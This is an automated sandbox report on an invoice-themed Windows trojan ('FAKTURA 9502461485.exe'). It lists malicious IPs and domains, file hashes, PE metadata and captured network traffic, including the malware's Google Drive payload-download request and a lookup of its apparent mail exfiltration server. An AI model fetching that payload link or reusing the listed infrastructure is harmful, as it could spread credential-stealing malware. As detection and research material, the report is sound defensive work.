                              https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.185.206
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              216.58.212.161
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse
                              116.202.203.61
                              furteksdokuma.com.trGermany
                              24940HETZNER-ASDEtrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:530352
                              Start date:29.11.2021
                              Start time:14:23:23
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 43s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:FAKTURA 9502461485.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:23
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@8/2@3/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 93%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, wdcpalt.microsoft.com, client.wns.windows.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              14:25:55API Interceptor2785x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              116.202.203.61exe.exeGet hashmaliciousBrowse
                                FACTURAS.exeGet hashmaliciousBrowse
                                  sG98fX27l7.exeGet hashmaliciousBrowse
                                    BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                      ejecutable.exeGet hashmaliciousBrowse
                                        TT COPY.exeGet hashmaliciousBrowse
                                          PEDIDO.exeGet hashmaliciousBrowse
                                            Request Quotation.exeGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HETZNER-ASDE2.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              2.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                              • 144.76.136.153
                                              BL_CI_PL.exeGet hashmaliciousBrowse
                                              • 88.99.22.5
                                              web-2099508479.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-2099508479.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-1859712127.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-1859712127.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              PKngA2BEjB.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              PKngA2BEjB.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              d2REPCiUoqGet hashmaliciousBrowse
                                              • 5.75.234.243
                                              web-1673899678.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-1673899678.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-1142655642.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-1142655642.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-115940.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              web-115940.xlsGet hashmaliciousBrowse
                                              • 116.202.249.144
                                              Payment Advice.exeGet hashmaliciousBrowse
                                              • 144.76.136.153

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e192.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              BL_CI_PL.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web-2099508479.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web-1859712127.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              PKngA2BEjB.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web-1673899678.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              61c526c5-c558-462b-b5a9-138a62b439e5.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              panionic.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web-1142655642.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              FACTURAS.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              web-115940.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              jH9lY2utAE.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              SecuriteInfo.com.W32.AIDetect.malware1.18149.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              LqESfLRNgh.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              phrkOEUqtU.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              U2fkDYwhFW.exeGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206
                                              research-1186335980.xlsGet hashmaliciousBrowse
                                              • 216.58.212.161
                                              • 142.250.185.206

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\~DFA363D71F6717A72C.TMP
                                              Process:C:\Users\user\Desktop\FAKTURA 9502461485.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):1.9866006611106688
                                              Encrypted:false
                                              SSDEEP:96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
                                              MD5:A256BBA112F7FA34FE9E19ED07D0DF83
                                              SHA1:3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
                                              SHA-256:AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
                                              SHA-512:9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
                                              Malicious:false
                                              Reputation:low
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              \Device\ConDrv
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):30
                                              Entropy (8bit):3.964735178725505
                                              Encrypted:false
                                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                              MD5:9F754B47B351EF0FC32527B541420595
                                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: NordVPN directory not found!..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):5.029637622456598
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:FAKTURA 9502461485.exe
                                              File size:155648
                                              MD5:34ae2e779e3b63f6450aacbaa6b5ab1d
                                              SHA1:0f7dc13bf5871f3ba281e064776371520b65bdd9
                                              SHA256:5bf5fa8d817fb2902dc28de115286e963b6dd4f5940d00e017b9944172972b25
                                              SHA512:e3e4091f41e56ab35f0be0fda28f7bd569b4ec3a9f513cfba7423eff71ac206563801103ec0ef15f8e3279578d45e2038d66861196f6c1d731929873a8ecfa48
                                              SSDEEP:1536:6sfJffaX1bYawjWTQGfLZDLmC30X5TnzlN26x64XhVfJffpfJff:bfJffqYiQuDLmCunzlFhVfJffpfJff
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......V.....................P............... ....@................

                                              File Icon

                                              Icon Hash:70ecccaececc71e2

                                              Static PE Info

                                              General

                                              Entrypoint:0x4015a8
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x56A09498 [Thu Jan 21 08:19:36 2016 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:458ac857eb15a6ebaad7748f2f663dae

                                              Entrypoint Preview

                                              Instruction
                                              push 00402DDCh
                                              call 00007F4F7CC0F815h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              dec eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [edi+40A213C6h], al
                                              fldenv [ebx+360FB946h]
                                              add dword ptr [ebx+0019CD89h], esp
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ecx], al
                                              add byte ptr [eax], al
                                              add byte ptr [ecx+6Fh], ch
                                              outsb
                                              and byte ptr [726F6620h], bh
                                              insb
                                              popad
                                              jnc 00007F4F7CC0F895h
                                              popad
                                              imul esi, dword ptr [edx+esi*2+65h], 72h
                                              add byte ptr [eax], ah
                                              and byte ptr [ebx+6Ch], al
                                              imul esp, dword ptr [ebp+6Eh], 00000000h
                                              dec esp
                                              xor dword ptr [eax], eax
                                              add eax, 75BE3F12h
                                              mov ch, D7h
                                              mov bl, 48h
                                              lodsd
                                              daa
                                              wait
                                              arpl word ptr [ebx+edx*4+22548EA1h], bp
                                              mov bh, CCh
                                              add eax, B2401A9Ah
                                              mov seg?, word ptr [ecx+edi-5Dh]
                                              jo 00007F4F7CC0F7CCh
                                              pop edx
                                              cmp cl, byte ptr [edi-53h]
                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                              or al, 00h
                                              stosb
                                              add byte ptr [eax-2Dh], ah
                                              xchg eax, ebx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              jp 00007F4F7CC0F838h
                                              add byte ptr [eax], al
                                              xchg eax, edx
                                              adc eax, 0B000000h
                                              add byte ptr [edx+6Eh], ah
                                              jnc 00007F4F7CC0F88Fh
                                              imul ebp, dword ptr [esi+67h], 00736E65h

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x217840x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x2f34.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x20d580x21000False0.360011245265data5.1903509422IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .data0x220000x12500x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x240000x2f340x3000False0.232340494792data4.20527594126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              CUSTOM0x2599a0x1542dataEnglishUnited States
                                              RT_ICON0x248f20x10a8data
                                              RT_ICON0x2448a0x468GLS_BINARY_LSB_FIRST
                                              RT_STRING0x26edc0x58dataEnglishUnited States
                                              RT_GROUP_ICON0x244680x22data
                                              RT_VERSION0x241c00x2a8dataEnglishUnited States

                                              Imports

                                              DLLImport
                                              MSVBVM60.DLL__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                              Version Infos

                                              DescriptionData
                                              Translation0x0409 0x04b0
                                              LegalCopyrightCorps
                                              InternalNameAfterpains9
                                              FileVersion1.00
                                              CompanyNameCorps
                                              LegalTrademarksCorps
                                              ProductNameCorps
                                              ProductVersion1.00
                                              FileDescriptionCorps
                                              OriginalFilenameAfterpains9.exe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2021 14:25:45.156703949 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.156776905 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.157004118 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.174417019 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.174470901 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.229690075 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.229829073 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.230009079 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.231739044 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.231976032 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.346009970 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.346077919 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.346787930 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.346914053 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.351625919 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.391992092 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.767410040 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.767664909 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.767712116 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.767874956 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.767915964 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.768049955 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.768071890 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.768686056 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.821259022 CET49789443192.168.11.20142.250.185.206
                                              Nov 29, 2021 14:25:45.821290016 CET44349789142.250.185.206192.168.11.20
                                              Nov 29, 2021 14:25:45.860512018 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.860553980 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.860898972 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.861128092 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.861156940 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.910342932 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.910677910 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.912966013 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.913254023 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.916805029 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.916841030 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.917403936 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:45.917577982 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.917880058 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:45.959894896 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.272599936 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.272785902 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.272861004 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.272999048 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.273044109 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.273052931 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.273076057 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.273097992 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.273350954 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.273962975 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.274270058 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.274720907 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.274907112 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.274941921 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.275218010 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.275271893 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.275494099 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.275650978 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.275846958 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.283421993 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.283611059 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.283655882 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.283843994 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.283890009 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.284053087 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.284089088 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.284255028 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.284305096 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.284346104 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.284409046 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.284579039 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.284744024 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.284908056 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.285119057 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.285167933 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.285284042 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.285429955 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.285773993 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.285931110 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.285979033 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.286034107 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.286202908 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.286628008 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.286791086 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.286870956 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.286916971 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.286937952 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.287131071 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.287565947 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.287738085 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.287786961 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.287827969 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.287926912 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.287972927 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.288476944 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.288649082 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.288769960 CET49790443192.168.11.20216.58.212.161
                                              Nov 29, 2021 14:25:46.288820028 CET44349790216.58.212.161192.168.11.20
                                              Nov 29, 2021 14:25:46.288830996 CET49790443192.168.11.20216.58.212.161

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2021 14:25:45.137398005 CET5250953192.168.11.201.1.1.1
                                              Nov 29, 2021 14:25:45.147022963 CET53525091.1.1.1192.168.11.20
                                              Nov 29, 2021 14:25:45.821779013 CET5226153192.168.11.201.1.1.1
                                              Nov 29, 2021 14:25:45.858912945 CET53522611.1.1.1192.168.11.20
                                              Nov 29, 2021 14:27:21.493170977 CET5284153192.168.11.201.1.1.1
                                              Nov 29, 2021 14:27:21.572004080 CET53528411.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 29, 2021 14:25:45.137398005 CET192.168.11.201.1.1.10xa036Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                              Nov 29, 2021 14:25:45.821779013 CET192.168.11.201.1.1.10x7e13Standard query (0)doc-14-5g-docs.googleusercontent.comA (IP address)IN (0x0001)
                                              Nov 29, 2021 14:27:21.493170977 CET192.168.11.201.1.1.10x2114Standard query (0)mail.furteksdokuma.com.trA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 29, 2021 14:25:45.147022963 CET1.1.1.1192.168.11.200xa036No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)
                                              Nov 29, 2021 14:25:45.858912945 CET1.1.1.1192.168.11.200x7e13No error (0)doc-14-5g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                              Nov 29, 2021 14:25:45.858912945 CET1.1.1.1192.168.11.200x7e13No error (0)googlehosted.l.googleusercontent.com216.58.212.161A (IP address)IN (0x0001)
                                              Nov 29, 2021 14:27:21.572004080 CET1.1.1.1192.168.11.200x2114No error (0)mail.furteksdokuma.com.trfurteksdokuma.com.trCNAME (Canonical name)IN (0x0001)
                                              Nov 29, 2021 14:27:21.572004080 CET1.1.1.1192.168.11.200x2114No error (0)furteksdokuma.com.tr116.202.203.61A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • doc-14-5g-docs.googleusercontent.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049789142.250.185.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-11-29 13:25:45 UTC0OUTGET /uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2021-11-29 13:25:45 UTC0INHTTP/1.1 302 Moved Temporarily
                                              Content-Type: text/html; charset=UTF-8
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 29 Nov 2021 13:25:45 GMT
